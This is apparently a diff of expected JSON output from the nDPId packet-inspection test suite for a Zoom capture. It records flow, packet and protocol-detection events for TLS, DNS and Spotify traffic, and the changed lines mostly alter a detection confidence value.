00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569520470060,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO8GVhg0yj7EwKgBdQG71lFyHvWD14gyiYASaQOGlAAAAgQFrAEBBAIBAwMM"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569520470061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520470061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBSXAqAF1NMo+xNZRAbvXiDKJch71hFAQIAAQZwAA"} -00835{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520469950,"flow_last_seen":1569520470086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470086,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00835{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520469950,"flow_last_seen":1569520470086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470086,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1569520470134,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470134,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVvA0yj7swKgBdQG71lK89vcv+u4WboASaQMynAAAAgQFrAEBBAIBAwMM"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1569520470134,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520470134,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBP3AqAF1NMo+7NZSAbv67hZuvPb3MFAQIAC8bgAA"} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470022,"flow_last_seen":1569520470165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470165,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01217{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01222{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470022,"flow_last_seen":1569520470165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470165,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01217{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01222{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569520470350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520470350,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjK4AAAAQEICiWc3wRwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470666,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1569520470666,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520470666,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABI4PAAAEARFPDAqAF1wKgB\/+EV4RUANLyaU3BvdFVkcDAJFTOWktM6lAABAARIlcIDDi3QR5gZLZgtSkZtNr91y8rdz4k="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470666,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470666,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470741,"flow_last_seen":1569520470741,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470741,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1569520470741,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470741,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAOwQAAP8R\/OHAqAF1wKgBAfRjADUALIWIr1EBAAABAAAAAAAACnpvb21mcjg1emMEem9vbQJ1cwAAAQAB"} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470741,"flow_last_seen":1569520470741,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470741,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr85zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470741,"flow_last_seen":1569520470741,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470741,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr85zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1569520470742,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470742,"pkt":"EBMx8Tl2KDc3AG3ICABFAABALr4AAP8RCSjAqAF1wKgBAeLPADUALAFaRhQBAAABAAAAAAAACnpvb21mcjg0emMEem9vbQJ1cwAAAQAB"} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1569520470742,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470742,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx7AqAF11ROQadZTAbug3l1NAAAAALAC\/\/8zBgAAAgQFtAEDAwUBAQgKJZzghQAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470755,"flow_last_seen":1569520470755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470755,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1569520470755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx\/AqAF11ROQaNZUAbsLvInbAAAAALAC\/\/+bjgAAAgQFtAEDAwUBAQgKJZzgkQAAAAAEAgAA"} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1569520470768,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1569520470768,"pkt":"KDc3AG3IEBMx8Tl2CABFAABQFgoAADcR6czAqAEBwKgBdQA19GMAPOFdr1GBgAABAAEAAAAACnpvb21mcjg1emMEem9vbQJ1cwAAAQABwAwAAQABAAABLAAE1fSMVQ=="} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470768,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr85zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.85"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470768,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": 